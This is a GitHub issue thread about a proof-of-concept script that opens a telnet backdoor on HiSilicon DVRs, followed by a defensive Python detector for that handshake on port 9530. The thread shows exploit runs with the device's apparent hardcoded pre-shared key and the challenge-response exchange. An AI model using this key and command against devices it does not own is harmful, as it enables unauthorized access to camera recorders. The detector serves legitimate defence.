tothi / hs-dvr-telnet

open telnet port on modern HiSilicon devices

doesn't work for me #2

Open pauldvg opened 4 years ago

pauldvg commented 4 years ago

Hello,

The PoC does not work on my xiongmaitech AHB7804R NVR (HiSilicon Hi3520) with the latest firmware (V3_V4.03.R11.7601).

When I run it I get:

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[+] Opening connection to 192.168.1.24 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:34929138
[*] using password live3636
[*] initializing (modified) 3des with key 34929138live3636
[*] sending encrypted challenge 8B:CB:CB:2B:86:85:0A:8C:D7:99:AB:6D:B8:D8:55:E4
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 54, in <module>
    dvrHelper.open_telnet(args.password)
  File "./hs-dvr-telnet.py", line 37, in open_telnet
    assert self.recv(2) == b"OK"
AssertionError

And then the 9530 port closes (I don't see it anymore on nmap). When I launch the script a second time I get:

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[-] Opening connection to 192.168.1.24 on port 9530: Failed
[ERROR] Could not connect to 192.168.1.24 on port 9530
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 53, in <module>
    dvrHelper = DvrHelper(args.host, PORT)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 75, in __init__
    self.sock   = self._connect(fam, typ)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 115, in _connect
    self.error("Could not connect to %s on port %d" % (self.rhost, self.rport))
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/log.py", line 417, in error
    raise PwnlibException(message % args)
pwnlib.exception.PwnlibException: Could not connect to 192.168.1.24 on port 9530

Rebooting the NVR reopens the 9530 port.

Thank you

pauldvg commented 4 years ago

I posted too fast and thought that the PSK argument was the admin password of the NVR GUI. When I use ./hs-dvr-telnet 192.168.1.24 2wj9fsa2 (or ./hs-dvr-telnet 192.168.1.24) I get:

(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 2wj9fsa2
[+] Opening connection to 192.168.1.24 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:78483811
[*] using password 2wj9fsa2
[*] initializing (modified) 3des with key 784838112wj9fsa2
[*] sending encrypted challenge 83:EF:D3:4E:DC:BE:BB:2E:93:EE:A3:80:58:62:A3:39
[+] verify:OK
[*] sending encrypted command Telnet:OpenOnce...
Traceback (most recent call last):
  File "./hs-dvr-telnet.py", line 54, in <module>
    dvrHelper.open_telnet(args.password)
  File "./hs-dvr-telnet.py", line 42, in open_telnet
    self.recvuntil("Open:")
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/tube.py", line 310, in recvuntil
    res = self.recv(timeout=self.timeout)
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/tube.py", line 82, in recv
    return self._recv(numb, timeout) or b''
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/tube.py", line 160, in _recv
    if not self.buffer and not self._fillbuffer(timeout):
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/tube.py", line 131, in _fillbuffer
    data = self.recv_raw(self.buffer.get_fill_size())
  File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
    raise EOFError
EOFError

Thank you
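The two transcripts in this thread show the whole helper-port exchange on 9530 (OpenTelnet:OpenOnce, a randNum challenge, a 16-byte encrypted answer, verify:OK, then Open:). The following is an added example, not from the issue or the hs-dvr-telnet project: a small stateful detector a defender can run over packet payloads exported from a capture to spot this handshake against their own DVRs; the Packet record layout, the client address and the all-zero 16-byte placeholder answer are constructed assumptions.

```python
from collections import namedtuple
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

DVR_HELPER_PORT = 9530  # port carrying the OpenTelnet:OpenOnce handshake in the issue's transcript
Packet = namedtuple("Packet", "src sport dst dport payload")  # one TCP segment with its payload (assumed layout)

@dataclass
class HandshakeState:
    stage: str = "none"  # none -> requested -> challenged -> responded -> verified -> opened
    rand_num: Optional[str] = None  # the randNum the DVR issued, kept for the alert

def track_handshakes(packets: List[Packet]) -> Dict[Tuple[str, str], HandshakeState]:
    """Advance one state machine per (client, dvr) pair, in capture order."""
    flows: Dict[Tuple[str, str], HandshakeState] = {}
    for p in packets:
        if p.dport == DVR_HELPER_PORT:  # client -> DVR
            st = flows.setdefault((p.src, p.dst), HandshakeState())
            if p.payload.startswith(b"OpenTelnet:OpenOnce"):
                st.stage = "requested"
            elif st.stage == "challenged" and len(p.payload) == 16:
                st.stage = "responded"  # 16-byte encrypted challenge answer
        elif p.sport == DVR_HELPER_PORT:  # DVR -> client; replies with no seen request are ignored
            st = flows.get((p.dst, p.src))
            if st is None:
                continue
            if st.stage == "requested" and p.payload.startswith(b"randNum:"):
                st.rand_num = p.payload[8:].strip().decode(errors="replace")
                st.stage = "challenged"
            elif st.stage == "responded" and p.payload.startswith(b"verify:OK"):
                st.stage = "verified"
            elif st.stage == "verified" and p.payload.startswith(b"Open:"):
                st.stage = "opened"
    return flows

def severity(st: HandshakeState) -> Optional[str]:
    # HIGH once the DVR accepted the challenge answer, MEDIUM for any earlier attempt, None otherwise
    if st.stage in ("verified", "opened"):
        return "HIGH"
    return "MEDIUM" if st.stage != "none" else None

def sample_capture() -> List[Packet]:
    """Constructed segments mirroring the issue's second run: challenge accepted, then the DVR hangs up."""
    c, d = "192.168.1.50", "192.168.1.24"  # client address is constructed; DVR address from the issue
    return [
        Packet(c, 40001, d, DVR_HELPER_PORT, b"OpenTelnet:OpenOnce"),
        Packet(d, DVR_HELPER_PORT, c, 40001, b"randNum:78483811"),
        Packet(c, 40001, d, DVR_HELPER_PORT, bytes(16)),  # placeholder for the encrypted answer
        Packet(d, DVR_HELPER_PORT, c, 40001, b"verify:OK"),
    ]
```

Feeding the first three constructed segments alone reproduces the issue's first run (no verify:OK after the answer), which the detector reports as a MEDIUM attempt rather than a HIGH authenticated session.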